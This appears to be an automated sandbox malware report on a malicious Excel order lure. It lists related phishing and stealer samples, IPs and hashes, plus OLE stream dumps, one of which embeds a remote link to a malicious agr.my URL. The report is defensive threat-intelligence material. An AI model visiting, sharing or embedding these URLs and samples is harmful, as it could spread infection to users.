                    Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                      13.107.246.40Payment Transfer Receipt.shtmlGet hashmaliciousHTMLPhisherBrowse
                      • www.aib.gov.uk/
                      NEW ORDER.xlsGet hashmaliciousUnknownBrowse
                      • 2s.gg/3zs
                      PO_OCF 408.xlsGet hashmaliciousUnknownBrowse
                      • 2s.gg/42Q
                      06836722_218 Aluplast.docx.docGet hashmaliciousUnknownBrowse
                      • 2s.gg/3zk
                      Quotation.xlsGet hashmaliciousUnknownBrowse
                      • 2s.gg/3zM
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      s-0005.dual-s-msedge.netProforma invoice.xlsGet hashmaliciousUnknownBrowse
                      • 52.123.128.14
                      Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 52.123.129.14
                      Proforma invoice.xlsGet hashmaliciousUnknownBrowse
                      • 52.123.129.14
                      Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 52.123.129.14
                      Proforma invoice.xlsGet hashmaliciousUnknownBrowse
                      • 52.123.128.14
                      Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 52.123.129.14
                      Payment Advice Note from 25.03.2025.msgGet hashmaliciousUnknownBrowse
                      • 52.123.128.14
                      Filled-Summons Notice (2).docxGet hashmaliciousHTMLPhisherBrowse
                      • 52.123.128.14
                      agr.myTransferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 147.79.86.93
                      Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 147.79.86.93
                      Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 147.79.86.93
                      s-part-0012.t-0009.t-msedge.netE1AcRCtgSA.exeGet hashmaliciousUnknownBrowse
                      • 13.107.246.40
                      Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 13.107.246.40
                      Proforma invoice.xlsGet hashmaliciousUnknownBrowse
                      • 13.107.246.40
                      Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 13.107.246.40
                      Proforma invoice.xlsGet hashmaliciousUnknownBrowse
                      • 13.107.246.40
                      Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 13.107.246.40
                      92.255.85.2.exeGet hashmaliciousXWormBrowse
                      • 13.107.246.40
                      EwZAaQu0yXKbde7.exeGet hashmaliciousAsyncRAT, PureLog Stealer, XWormBrowse
                      • 13.107.246.40
                      https://teddyslimo.comGet hashmaliciousHTMLPhisherBrowse
                      • 13.107.246.40
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      SRS-6-Z-7381USPURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 209.46.124.102
                      PURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 209.46.124.102
                      PURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 209.46.124.102
                      http://paulsss.comGet hashmaliciousUnknownBrowse
                      • 67.217.228.6
                      http://paulsss.comGet hashmaliciousUnknownBrowse
                      • 67.217.228.6
                      https://cisco.bayada.com/ucmuser/mainGet hashmaliciousUnknownBrowse
                      • 69.164.117.207
                      mybestgirlformybestkissesever.vbsGet hashmaliciousRemcosBrowse
                      • 69.48.201.40
                      0.vbsGet hashmaliciousRemcosBrowse
                      • 69.48.201.40
                      EKSENBILISIMTRTransferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 147.79.86.93
                      Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 147.79.86.93
                      Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 147.79.86.93
                      i686.elfGet hashmaliciousUnknownBrowse
                      • 212.60.30.63
                      na.elfGet hashmaliciousUnknownBrowse
                      • 147.79.124.110
                      http://elcharrousa.comGet hashmaliciousUnknownBrowse
                      • 147.79.123.22
                      El3cE5jq1L.pdfGet hashmaliciousUnknownBrowse
                      • 45.143.99.2
                      0YyNtXEF7a.pdfGet hashmaliciousUnknownBrowse
                      • 45.143.99.2
                      MICROSOFT-CORP-MSN-AS-BLOCKUSZhIz2QlcxM.exeGet hashmaliciousTofseeBrowse
                      • 52.101.8.49
                      E1AcRCtgSA.exeGet hashmaliciousUnknownBrowse
                      • 204.79.197.203
                      Proforma invoice.xlsGet hashmaliciousUnknownBrowse
                      • 13.107.246.38
                      Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 13.107.246.40
                      Proforma invoice.xlsGet hashmaliciousUnknownBrowse
                      • 13.107.246.40
                      Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 13.107.246.40
                      Proforma invoice.xlsGet hashmaliciousUnknownBrowse
                      • 13.107.246.40
                      Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 13.107.246.40
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      6271f898ce5be7dd52b0fc260d0662b3Proforma invoice.xlsGet hashmaliciousUnknownBrowse
                      • 147.79.86.93
                      Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 147.79.86.93
                      Proforma invoice.xlsGet hashmaliciousUnknownBrowse
                      • 147.79.86.93
                      Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 147.79.86.93
                      PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 147.79.86.93
                      PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 147.79.86.93
                      PURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 147.79.86.93
                      PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 147.79.86.93
                      PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 147.79.86.93
                      a0e9f5d64349fb13191bc781f81f42e1E1AcRCtgSA.exeGet hashmaliciousUnknownBrowse
                      • 13.107.246.40
                      Proforma invoice.xlsGet hashmaliciousUnknownBrowse
                      • 13.107.246.40
                      Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 13.107.246.40
                      Proforma invoice.xlsGet hashmaliciousUnknownBrowse
                      • 13.107.246.40
                      Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 13.107.246.40
                      Payment Advice 24-03-2025.docxGet hashmaliciousUnknownBrowse
                      • 13.107.246.40
                      file.exeGet hashmaliciousLummaC StealerBrowse
                      • 13.107.246.40
                      file.exeGet hashmaliciousLummaC StealerBrowse
                      • 13.107.246.40
                      file.exeGet hashmaliciousLummaC StealerBrowse
                      • 13.107.246.40
                      No context
                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):118
                      Entropy (8bit):3.5700810731231707
                      Encrypted:false
                      SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                      MD5:573220372DA4ED487441611079B623CD
                      SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                      SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                      SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):784
                      Entropy (8bit):2.7137690747287806
                      Encrypted:false
                      SSDEEP:24:YIrNvpKAzLRwcfHGF8AJp9WtAZRJ5poIHWI:YmbfzLmc88AJtfJ52IHV
                      MD5:09F73B3902CD3D88E04312787956B654
                      SHA1:A6C275F1A65DB02D8A752C614C27E88326447C41
                      SHA-256:72971990E5DC57AC8F4F27701158F6DC16E235814EA17DECA95E59CF5F60BC26
                      SHA-512:6A68530BA4D4413B587E340CF871162036B6AC60AC0F969C07C70967C3102ADDE3C895BA6F1E2590D9D0C98C253ADFA33CA84E65106C3B56F506FE0E06F0ADA9
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.
                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):512
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3::
                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):165
                      Entropy (8bit):1.7769794087092887
                      Encrypted:false
                      SSDEEP:3:iXKG/4N+RMlW8td:iXlMlW8/
                      MD5:37BD8218D560948827D3B948CAFA579C
                      SHA1:24347FB0A66F2DA8AD3BAB818E3C24977104E5DA
                      SHA-256:189E2D5600E0CC41F498D2EB22FA451F81746DCDBAA3EC1146A22C3A74452DA6
                      SHA-512:A34D703FEBFD9E45A57BF047D9CCF890482B0F7CD3788F9BFD89DECA13B96DD4F43BDB0C4D81CC716DEAC37BCD1C393A7BCB159B471B5721B367E4884B17C699
                      Malicious:true
                      Preview:.user ..f.r.o.n.t.d.e.s.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Mar 26 04:05:24 2025, Security: 1
                      Entropy (8bit):7.982460847573051
                      TrID:
                      • Microsoft Excel sheet (30009/1) 47.99%
                      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                      File name:ORDER 517-2025.xla.xlsx
                      File size:1'263'104 bytes
                      MD5:f9137fe9005de451da58b57301dba5b9
                      SHA1:5d756a8364f3382703825b71c89247bb2d156f11
                      SHA256:32df4f4afa4d06c6096d807535d584556cb7dca6234088299106a93a49a8e4ef
                      SHA512:7b4e958e45047e28649ccd71f1269207b57f6504841aa1fc0a0e6a5ad63b23a34e1264cdebd94513763808acd9957204dd8ae421d9af2772ade2bdb09872a9f1
                      SSDEEP:24576:vk/BbDqMApAUspxvqbY43WZHzn0M9cWNVDfrsnlCdbPusr:vcRwEpxybY43WF0MtDDTMElW
                      TLSH:A14523947B80DF77C9A344BC959B8549811AFC807B59CBA3724A735A78313B0866F38F
                      File Content Preview:........................>...................................v...................................................................................y.......{......................................................................................................
                      Icon Hash:35e58a8c0c8a85b9
                      Document Type:OLE
                      Number of OLE Files:1
                      Has Summary Info:
                      Application Name:Microsoft Excel
                      Encrypted Document:True
                      Contains Word Document Stream:False
                      Contains Workbook/Book Stream:True
                      Contains PowerPoint Document Stream:False
                      Contains Visio Document Stream:False
                      Contains ObjectPool Stream:False
                      Flash Objects Count:0
                      Contains VBA Macros:True
                      Code Page:1252
                      Author:
                      Last Saved By:
                      Create Time:2006-09-16 00:00:00
                      Last Saved Time:2025-03-26 04:05:24
                      Creating Application:Microsoft Excel
                      Security:1
                      Document Code Page:1252
                      Thumbnail Scaling Desired:False
                      Contains Dirty Links:False
                      Shared Document:False
                      Changed Hyperlinks:False
                      Application Version:786432
                      General
                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                      VBA File Name:Sheet1.cls
                      Stream Size:977
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y j s . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a7 79 6a 73 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Attribute VB_Name = "Sheet1"
                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                      Attribute VB_GlobalNameSpace = False
                      Attribute VB_Creatable = False
                      Attribute VB_PredeclaredId = True
                      Attribute VB_Exposed = True
                      Attribute VB_TemplateDerived = False
                      Attribute VB_Customizable = True
                      

                      General
                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                      VBA File Name:Sheet2.cls
                      Stream Size:977
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y E . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a7 79 45 1d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Attribute VB_Name = "Sheet2"
                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                      Attribute VB_GlobalNameSpace = False
                      Attribute VB_Creatable = False
                      Attribute VB_PredeclaredId = True
                      Attribute VB_Exposed = True
                      Attribute VB_TemplateDerived = False
                      Attribute VB_Customizable = True
                      

                      General
                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                      VBA File Name:Sheet3.cls
                      Stream Size:977
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y $ D . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a7 79 24 44 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Attribute VB_Name = "Sheet3"
                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                      Attribute VB_GlobalNameSpace = False
                      Attribute VB_Creatable = False
                      Attribute VB_PredeclaredId = True
                      Attribute VB_Exposed = True
                      Attribute VB_TemplateDerived = False
                      Attribute VB_Customizable = True
                      

                      General
                      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                      VBA File Name:ThisWorkbook.cls
                      Stream Size:985
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y P . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a7 79 d8 50 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Attribute VB_Name = "ThisWorkbook"
                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                      Attribute VB_GlobalNameSpace = False
                      Attribute VB_Creatable = False
                      Attribute VB_PredeclaredId = True
                      Attribute VB_Exposed = True
                      Attribute VB_TemplateDerived = False
                      Attribute VB_Customizable = True
                      

                      General
                      Stream Path:\x1CompObj
                      CLSID:
                      File Type:data
                      Stream Size:114
                      Entropy:4.25248375192737
                      Base64 Encoded:True
                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                      General
                      Stream Path:\x5DocumentSummaryInformation
                      CLSID:
                      File Type:data
                      Stream Size:244
                      Entropy:2.889430592781307
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                      General
                      Stream Path:\x5SummaryInformation
                      CLSID:
                      File Type:data
                      Stream Size:200
                      Entropy:3.2423021151327975
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . Z L . . . . . . . . . .
                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                      General
                      Stream Path:MBD00E31B38/\x1CompObj
                      CLSID:
                      File Type:data
                      Stream Size:99
                      Entropy:3.631242196770981
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                      General
                      Stream Path:MBD00E31B38/Package
                      CLSID:
                      File Type:Microsoft Excel 2007+
                      Stream Size:1099182
                      Entropy:7.995133395558438
                      Base64 Encoded:True
                      Data ASCII:P K . . . . . . . . . . ! . w 1 . . . . j . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 77 31 d5 0e e3 01 00 00 6a 08 00 00 13 00 cd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 c9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      General
                      Stream Path:MBD00E31B39/\x1Ole
                      CLSID:
                      File Type:data
                      Stream Size:718
                      Entropy:5.460169186385878
                      Base64 Encoded:False
                      Data ASCII:. . . . . W B o . . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . a . g . r . . . m . y . / . m . S . G . a . l . N . ? . & . m . o . r . n . i . n . g . . . & h . > X . F . . . ' N Q C t : { & Y 1 . # . v 3 . } . % . S ` M R . . B . y . 9 6 L . . b a + . 8 . . f n . g . ] & Q f . N / T . V . : < y 2 . . { . O d | . 2 + y . 6 . 0 K L 9 * . . . . . . . . . . . . . . . . z . . . p . l . y . p . V . n . j . O . 9 . P . q . u . Z . C . h . K . N . o . 5 . 2 . H . N . h . F . X
                      Data Raw:01 00 00 02 ff a1 01 57 42 6f de 0a 00 00 00 00 00 00 00 00 00 00 00 00 f4 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b f0 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 61 00 67 00 72 00 2e 00 6d 00 79 00 2f 00 6d 00 53 00 47 00 61 00 6c 00 4e 00 3f 00 26 00 6d 00 6f 00 72 00 6e 00 69 00 6e 00 67 00 00 00 26 68 d3 be 3e 8c 58 1c 20 46 a2 c6 b4 0a 01 27 fa 4e
                      General
                      Stream Path:Workbook
                      CLSID:
                      File Type:Applesoft BASIC program data, first line number 16
                      Stream Size:139423
                      Entropy:7.995407604620061
                      Base64 Encoded:True
                      Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . ^ ` . \\ O # . I U 3 0 G . s Q L j y Z 6 N . \\ N a r B . . . . . . . . . . # . . . \\ . p . | 2 % . K E c ; . 5 . . L . b . . C V 2 O . w J . . & A v W n | . . . b . ? q k . / B r v / d . O + . K @ J B . . . k a . . . . . . . = . . . , 6 . . . . l : w U n . . . . . . . . . . . . . . . . . . . . ( . . . z = . . . 8 . / . @ { . U @ . . . 5 . . . " . . . } . . . . { . . . . . . . 1 . . . . . ? . W z ' X b l , u . 9 a y 1 . . . . 6 T 7 . p U . . h R f ) @
                      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 81 5e 60 0a 5c f5 4f 23 1a e3 b9 49 55 33 ba ba f1 e4 30 47 c6 16 73 80 c2 51 4c 6a f7 a0 79 5a bf 81 36 4e 90 0c e9 5c 4e f0 61 c6 ff 72 f2 42 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 de 23 e2 00 00 00 5c 00 70 00 9c cc fa 7c 32 25 1c 4b 9c 45 63 db ff e3 af 3b bd 0d f5 8d 35 89 e4 fb 20 9b
                      General
                      Stream Path:_VBA_PROJECT_CUR/PROJECT
                      CLSID:
                      File Type:ASCII text, with CRLF line terminators
                      Stream Size:533
                      Entropy:5.247821152121627
                      Base64 Encoded:True
                      Data ASCII:I D = " { 6 F D 0 0 2 2 1 - 2 3 5 0 - 4 4 9 5 - A 0 2 D - 9 E 7 1 A B C 7 6 5 6 6 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " B 7 B 5 1 5 B 8 E B 4 8 D E 4 C D
                      Data Raw:49 44 3d 22 7b 36 46 44 30 30 32 32 31 2d 32 33 35 30 2d 34 34 39 35 2d 41 30 32 44 2d 39 45 37 31 41 42 43 37 36 35 36 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                      General
